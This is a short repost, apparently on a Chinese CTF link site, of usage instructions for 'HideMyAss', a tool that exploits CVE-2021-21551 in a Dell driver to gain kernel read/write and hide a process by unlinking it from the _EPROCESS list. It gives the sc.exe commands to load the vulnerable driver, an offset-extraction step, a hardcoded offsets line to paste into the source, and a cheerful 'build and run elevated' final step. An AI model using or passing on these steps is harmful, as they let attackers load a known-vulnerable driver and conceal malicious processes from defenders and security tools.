HideMyAss CVE-2021-21551 (Vulnerable DELL Driver)

渗透技巧 1年前 (2022) admin
487 0 0

HideMyAss

basically rewrite from SpikySabra/Kernel-Cactus to abuse CVE-2021-21551 (Vulnerable DELL Driver) to arbitrary read/write in the kernel, then unlink the current process from nt!_EPROCESS to hide itself.

Step 1.

Use an elevated UAC console to load DELL’s driver:

sc.exe create dbutil_2_3 binpath= C:\path\to\dbutil_2_3.sys type= filesys
sc.exe start dbutil_2_3

Step 2.

Use an elevated UAC console to use Radare2 debugger to extract _EPROCESS offsets of current Ntoskrnl. It’s a necessary step, because the offsets always change up to the Windows Build version.

set PATH=%PATH%; C:\radare2-5.7.4-w64\bin
python offsetExtract.py -i C:\Windows\System32\ntoskrnl.exe

After executing the python script, it will drop a CVS file (NtoskrnlCSV.csv) containing current Ntoskrnl offsets. Open it with Notepad, copy those offsets, and use them to replace the number at line 111 of HideMyAss.cpp

NtoskrnlOffsetsBuild Offsets = { 0x448,0x440,0x5e0, 0x87a,0x4b8,0x570, 0x90, 0x168, 0x4e8, 0x478, 0xc19838, 0x20, 0x60, 0x28 };

 

Step 3.

Build the project and run the binary with elevated UAC privilege. Enjoy 🙂

HideMyAss CVE-2021-21551 (Vulnerable DELL Driver)

HideMyAss CVE-2021-21551 (Vulnerable DELL Driver)

HideMyAss CVE-2021-21551 (Vulnerable DELL Driver)

 

版权声明:admin 发表于 2022年11月26日 下午11:29。
转载请注明:HideMyAss CVE-2021-21551 (Vulnerable DELL Driver) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...